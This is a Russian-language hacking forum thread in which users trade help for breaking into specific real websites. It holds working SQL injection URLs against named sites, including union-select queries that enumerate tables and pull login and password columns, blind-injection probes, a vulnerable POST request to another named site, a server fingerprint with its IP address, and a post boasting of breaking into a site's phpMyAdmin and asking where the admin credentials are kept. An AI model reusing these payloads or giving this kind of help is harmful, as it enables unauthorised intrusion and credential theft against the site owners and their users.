• XSS.stack #1 – первый литературный журнал от юзеров форума

[web-hacking] Ваши вопросы

Пожалуйста, обратите внимание, что пользователь заблокирован
Чисто теоритически я все понял но я не знаю как делать инъекцию, а про шелл кое как знаю немного
Гугли статьи, ты задолбал набивать посты.... я чувствую себя дворником, по секрету твой ник поднят в разделе бана, так что либо исправляйся либо все проголосуют "да".
 
ппц..."..гугл в руки, что за глупые вопросы..." окуено информативный форум. один чел задает вопрос в рубрике общие вопросы, другой чел пугает его за это баном. И посля 31.08 ни одного поста. :shit:

[mod][Одинокий Волк:] С умничал? Не нравиться чё тогда тут флудишь? На любом форуме тебе так ответят, у кого есть желания рассасывать в миллион первый раз одно и то же, что уже много лет на столько рассасали что если забить в гугл, то можно чуть ли уже не гуру в этой области за 15 минут стать.
А по поводу бана, услышал звон да не знаешь где он. Каникулы уже начались?[/mod]
 
Нарыл скулю...вроде блинд, но и как блинд не крутится..

URL: oneclicktube.com/process.wget_upload.php

HTTP/1.0
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, */*;q=0.1
Content-Type: application/x-www-form-urlencoded
Content-length: 214
Connection: Close

title=&keywords=12&pornstars=assa&description=assa &channel=assa&paysite=assa&url='&button=Reset&submit=Upload&

Уязвима переменная URL
Передавать данный POST ом онли!
 
почитай http://ru.wikipedia.org/wiki/HTTP . там все очень хорошо описано о GET/POST.
разница между ними только в разных частях http-запроса. (гет - заголовок, пост - тело)

а проводить их удобно и inetcrack, но я например предпочитаю HTTPAnalyzer (он есть здесь )
 
всем привет.
человек нашел sql инъекцию.. я попытался вывести логин и пасс..
поля нашел...но их не выводит...гляньте плиз в чем может быть проблема)
help me)) :bang:
Код:
Столбцы

http://www.kvazar.ru/price_new.htm?group_id=-24+union+select+1,2,user(),4,5,6,7--

таблица  User

http://www.kvazar.ru/price_new.htm?group_id=-24+union+select+1,2,TABLE_NAME,4,5,6,7%20FROM%20INFORMATION_SCHEMA.TABLES%20LIMIT%2041,1--

поле login и password и name и phone и тп

http://www.kvazar.ru/price_new.htm?group_id=-24+union+select+1,2,COLUMN_NAME,4,5,6,7+FROM+INFORMATION_SCHEMA.COLUMNS+WHERE+TABLE_NAME='User'+LIMIT+1,1--

смотрим логин и его не выводит по неведомым причинам

http://www.kvazar.ru/price_new.htm?group_id=-24+union+select+1,2,login,4,5,6,7+FROM+'User'+LIMIT+1,1--
 
Подскажите пожалуйсто по SQL Injection.
Нашёл уязвимый сайт, кол-во полей: 1.
Из этого поля не чё не выводится (да же версия mysql).
Уже не знаю чё делать, всё перегуглил, ответ на вопрос так и не нашёл(((
Пожалуйсто подскажите.
Заранее благодарен :)
 
Host IP: 217.112.37.29
Web Server: Apache/1.3.33 (Unix) mod_fastcgi/2.4.0 FrontPage/5.0.2.2623 PHP/4.3.10 mod_gzip/1.3.19.1a mod_ssl/2.8.22 OpenSSL/0.9.7b rus/PL30.20
Powered-by: PHP/4.3.10
DB Server:MySQL 4.3.10
названия столбцов и колонок в ручную подбирать...
 
Потренируйся в блинде,правдо версия БД 4.0.27-max-log
Делаем вначале
Код:
http://www.beef.kirov.ru/news/?nid=16+and+1=1
Страница загрузилась без ошибок.Делаем
Код:
http://www.beef.kirov.ru/news/?nid=16+and+1=0
Страница загружается с ошибкой или другим контентом,тогда есть слепая инъекция.
 
При "слепой SQL инъекции", диагностические сообщения об ошибках не выводятся, поэтому при реализации такой атаки все действия производятся вслепую и, как правило, подбором. Причем из-за отсутствия диагностических сообщений данная уязвимость не является безопасной и тяжело реализуемой
Вначале изучи мануалы все которые найдешь,потом спрашивай.
 
Какая разница откуда я скопировал.Попробуй провести неслупую,если удастся+5 тебе в дневник.Если скулю неполучается провести простым способом,необходимо попробовать провести ее вслепую.
 
Я тут у одного сайта ломанул PHPmyadmin.
Тупо, но не знаю где таблица с логинами и пасами админов((((
Подскажите кто чё может, если можно по подробнй.
Вот скрин:
Скрин
 


Напишите ответ...
  • Вставить:
Прикрепить файлы
Верх